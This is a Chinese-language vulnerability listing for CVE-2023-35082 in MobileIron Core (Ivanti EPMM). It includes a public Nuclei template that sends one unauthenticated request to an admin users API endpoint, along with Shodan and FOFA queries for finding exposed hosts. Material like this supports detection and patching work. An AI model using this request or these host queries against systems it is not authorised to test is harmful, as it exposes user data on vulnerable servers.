CVE-2023-35082: MobileIron Core - Remote Unauthenticated API Access

日期: 2025-08-01 | 影响软件: MobileIron Core | POC: 已公开

漏洞描述

Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.

PoC代码[已公开]

id: CVE-2023-35082

info:
  name: MobileIron Core - Remote Unauthenticated API Access
  author: DhiyaneshDk
  severity: critical
  description: |
    Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain.
  impact: |
    Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions.
  remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM)
  reference:
    - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35082
    - https://forums.ivanti.com/s/article/CVE-2023-35082-Remote-Unauthenticated-API-Access-Vulnerability-in-MobileIron-Core-11-2-and-older?language=en_US
    - https://github.com/Chocapikk/CVE-2023-35082
    - https://github.com/Ostorlab/KEV
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-35082
    cwe-id: CWE-287
    epss-score: 0.9445
    epss-percentile: 0.99991
    cpe: cpe:2.3:a:ivanti:endpoint_manager_mobile:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: ivanti
    product: endpoint_manager_mobile
    shodan-query:
      - http.favicon.hash:362091310
      - http.favicon.hash:"362091310"
    fofa-query: icon_hash="362091310"
  tags: cve2023,cve,ivanti,mobileiron,epmm,kev

http:
  - method: GET
    path:
      - "{{BaseURL}}/mifs/asfV3/api/v2/admins/users"

    max-size: 100
    matchers:
      - type: dsl
        dsl:
          - contains_all(body, 'results','userId','name')
          - contains(header, 'application/json')
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100e759e56b945d6c98214049c350cb98d79301c1067cee270791d84f50242bc6ec022100f6507b630eac0aeae1768f7b176a98bf9c48596057d97f90fd207c7c73e27337:922c64590222798bb761d5b6d8e72950

相关漏洞推荐